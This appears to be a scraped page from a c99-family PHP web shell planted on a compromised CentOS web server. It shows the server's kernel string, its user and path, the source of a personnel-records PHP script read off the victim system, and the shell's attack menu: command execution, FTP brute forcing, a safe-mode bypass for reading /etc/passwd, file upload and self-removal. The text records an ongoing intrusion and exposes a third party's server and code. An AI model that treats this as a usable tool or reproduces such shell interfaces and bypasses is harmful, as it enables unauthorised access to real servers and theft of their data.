!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     searchPsTable.php (23.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchByDeptMaxDocGroup($deptId,$oDP->SearchMaxDocGroup());
		while($oDlc->GetRecord()){
				$oDlc->Edit();
				$oDlc->DlcID=$oDlc->DlcID;
				$oDlc->deptId=$oDlc->deptId;
				$oDlc->DlpID=$oDlc->DlpID;
				$oDlc->personId=$oDlc->personId;
				$oDlc->DlcSeq=$oDlc->DlcSeq;
				$oDlc->docGroup=$oDlc->docGroup;
				$oDlc->confirm="Y";
				$oDlc->DlcActive=$oDlc->DlcActive;
				$oDlc->Save();
		}
?>
		
SearchByDeptMaxDocGroup($deptId,$oDP->SearchMaxDocGroup()); 
			$checkuse=0;
			while($oDlc2->GetRecord()){
					$oRs->SearchByDlcIDDocGroup2($oDlc2->DlcID,$oDP->SearchMaxDocGroup());
					if($oRs->GetRecord()==1){
									$checkuse++;
					}
			}
			//echo "checkuse=".$checkuse;
		if($checkuse=="0"){
			$oDlc->SearchByDeptMaxDocGroup($deptId,$oDP->SearchMaxDocGroup());
			while($oDlc->GetRecord()){
					$oDlc->Delete();
			}
		}else{
?>
		

		
SearchByKey($DlcID);
		if($oDlc->GetRecord()==1){ //edit
				//echo "A
"; $oDlc->Edit(); $oDlc->DlcID=$DlcID; $oDlc->deptId=$oDlc->deptId; $oDlc->DlpID=$oDlc->DlpID; $oDlc->personId=$personId; $oDlc->DlcSeq=$oDlc->DlcSeq; $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oDlc->docGroup=$oDP->docGroup; $oDlc->DlcActive=$oDlc->DlcActive; $oDlc->Save(); if($personId[$r]!="0" && $personId[$r]!=""){ //setUMS($personId[$r],$oDlp->GpID); $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $oUus->SearchByUsPsCode($personId); $oUus->GetRecord(); echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp->GpID; echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } }else{ //add new line //echo "B
"; $oDlc1->AddNew(); $oDlc1->DlcID=$DlcID; //echo "DlcID=".$oDlc1->DlcID."
"; $oDlc1->deptId=$deptId; //echo "deptId=".$oDlc1->deptId."
"; $oDlc1->personId=$personId; //echo "personId=".$oDlc1->personId."
"; $oDlc1->DlcSeq=$DlcSeq; //echo "DlcSeq=".$oDlc1->DlcSeq."
"; $oDP->SearchByKey($oDlc1->deptId); $oDP->GetRecord(); $oDlc1->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc1->docGroup."
"; $oDlc1->Save(); } ?> SearchByKey($DlcID); if($oDlc->GetRecord()==1){ //edit //echo "A
"; $oDlc->Edit(); $oDlc->DlcID=$DlcID; $oDlc->deptId=$oDlc->deptId; $oDlc->DlpID=$oDlc->DlpID; $oDlc->personId=$personId; $oDlc->DlcSeq=$oDlc->DlcSeq; $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oDlc->docGroup=$oDP->docGroup; $oDlc->DlcActive=$oDlc->DlcActive; $oDlc->Save(); if($personId[$r]!="0" && $personId[$r]!=""){ //setUMS($personId[$r],$oDlp->GpID); $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $oUus->SearchByUsPsCode($personId); $oUus->GetRecord(); echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp->GpID; echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } }else{ //add new line //echo "B
"; $oDlc1->AddNew(); $oDlc1->DlcID=$DlcID; //echo "DlcID=".$oDlc1->DlcID."
"; $oDlc1->deptId=$deptId; //echo "deptId=".$oDlc1->deptId."
"; $oDlc1->personId=$personId; //echo "personId=".$oDlc1->personId."
"; $oDlc1->DlcSeq=$DlcSeq; //echo "DlcSeq=".$oDlc1->DlcSeq."
"; $oDP->SearchByKey($oDlc1->deptId); $oDP->GetRecord(); $oDlc1->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc1->docGroup."
"; $oDlc1->Save(); } ?> "; //no data }else{ //echo "
D===".$newposition."
"; $oDlc->SearchByKey($DlcID[$r]); $oDlc->GetRecord(); $oDlc->Edit(); // echo "oDlc->DlpID===".$oDlc->DlpID."
"; // echo "DlpID[r]===".$DlpID[$r]."
"; $oDlc->DlcID=$DlcID[$r]; //echo "DlcID=".$oDlc->DlcID."
"; $oDlc->deptId=$oDlc->deptId; //echo "deptId=".$oDlc->deptId."
"; $saveDlpID=$oDlc->DlpID; $oDlp->SearchByKey($DlpID[$r]); $oDlp->GetRecord(); //echo 'DlpPropose='.$oDlp->DlpPropose.'
'; if($oDlp->DlpPID=="0"){ //echo "no edit
"; $oDlc->DlpID=$DlpID[$r]; }else{ //echo "edit=".($DlpID[$r-1])."
"; $oDlp2->SearchDlpPIDByDlpID($DlpID[$r-1]); $oDlp2->GetRecord(); $oDlc->DlpID=$oDlp2->DlpID; $a=1; } $oDlp4->SearchByKey($oDlc->DlpID); $oDlp4->GetRecord(); //----set in ums if($saveDlpID!=$oDlc->DlpID){ $oDlp3->SearchByKey($oDlc->DlpID); $oDlp3->GetRecord(); $oUus->SearchByUsPsCode($personId[$r]); $oUus->GetRecord(); //echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp3->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); //echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp3->GpID; //echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; //echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } //echo "DlpID=".$oDlc->DlpID."
"; $oDlc->personId=$personId[$r]; //echo "personId=".$oDlc->personId."
"; $oDlc->DlcSeq=$DlcSeq[$r]; //echo "DlcSeq=".$oDlc->DlcSeq."
"; //echo "saveDlpID===".$saveDlpID."
"; //echo "oDlc->DlpID===".$oDlc->DlpID."
"; if($saveDlpID!=$oDlc->DlpID
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--